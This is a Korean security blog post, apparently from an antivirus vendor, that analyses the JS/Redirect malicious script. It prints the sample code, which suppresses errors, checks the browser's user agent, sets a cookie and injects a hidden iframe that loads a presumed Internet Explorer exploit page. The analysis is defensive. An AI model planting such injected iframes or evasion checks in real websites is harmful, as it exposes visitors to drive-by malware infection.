1. 서 론
JS/Redirect는 자바 스크립트로 제작되었고 다른 악성 스크립트를 다운로드 하여 실행하는 악성 스크립트에 대한 진단명이다. 주말을 기점으로 해서 JS/Redirect가 악성코드 Top 10에 2위에 랭크되어 있어 사용자들의 주의가 필요하다.
[그림 1] 악성코드 Top 10
2. JS/Redirect, 너의 정체는???
최근에 V3에 추가된 JS/Redirect를 분석해 보면 코드는 아주 간단하다.
// 접속 PC의 현황을 카운트하는 URL
<script language="javascript" src="http://count31.[중간생략].com/click.aspx?id=311957987&logo=1" charset="gb2312"></script>
<SCRIPT LANGUAGE="JavaScript">
<!-- Hide
function killErrors() {
return true;
}
window.onerror = killErrors;
// -->
// JS/Redirect가 실행될 조건 1
fEfYgDH1=navigator.userAgent.toLowerCase();
laAtA3=((fEfYgDH1.indexOf('windows nt 5.1')!=-1)||(fEfYgDH1.indexOf('windows xp')!=-1));
if(laAtA3&&navigator.userAgent.toLowerCase().indexOf("\x6D"+"\x73"+"\x69"+"\x65 \x38")!=-1)
location.replace("about:blank");
</script>
navigator.userAgent.toLowerCase()는 브라우저에서 사용하는 user agent의 정보를 얻는 함수
mozilla/4.0 (compatible; msie 8.0; windows nt 6.1; trident/4.0; slcc2; .net clr 2.0.50727; .net clr 3.5.30729; .net clr 3.0.30729; media center pc 6.0; mddc)
<script>
// JS/Redirect가 실행될 조건 2
window.onerror=function(){return true;}
if(document.cookie.indexOf("KXBXL=")==-1)
{
// 중복실행 방지를 위한 쿠키생성
var expires=new Date();
expires.setTime(expires.getTime()+24*60*60*1000);
document.cookie="KXBXL=Yes;path=/;expires="+expires.toGMTString();
document.write("<iframe width=100 height=0 src=load.html></iframe>");
}
</SCRIPT>
load.html은 흔히 해킹된 국내 웹 사이트를 통해서 유포되며, Internet Explorer의 보안 취약점을 통해서 악성코드를 다운로드하는 악성 스크립트로 추정된다.
만약 악성코드에 감염되고 싶다면 어떻게 하면 될까?????
'악성코드 정보' 카테고리의 다른 글
| 나도 모르게 스마트폰이 루팅되어있다? 안드로이드 악성어플 Android-Exploit/Zft (0) | 2011.03.28 |
|---|---|
| 농협 인터넷 뱅킹 피싱 사이트 주의 (2) | 2011.03.27 |
| 다중 취약점을 사용한 악성코드 유포사례 (2) | 2011.03.22 |
| 블로그 내 링크를 통해 유포되는 악성코드 (2) | 2011.03.16 |
| Android-Spyware/MinServ (0) | 2011.03.16 |
댓글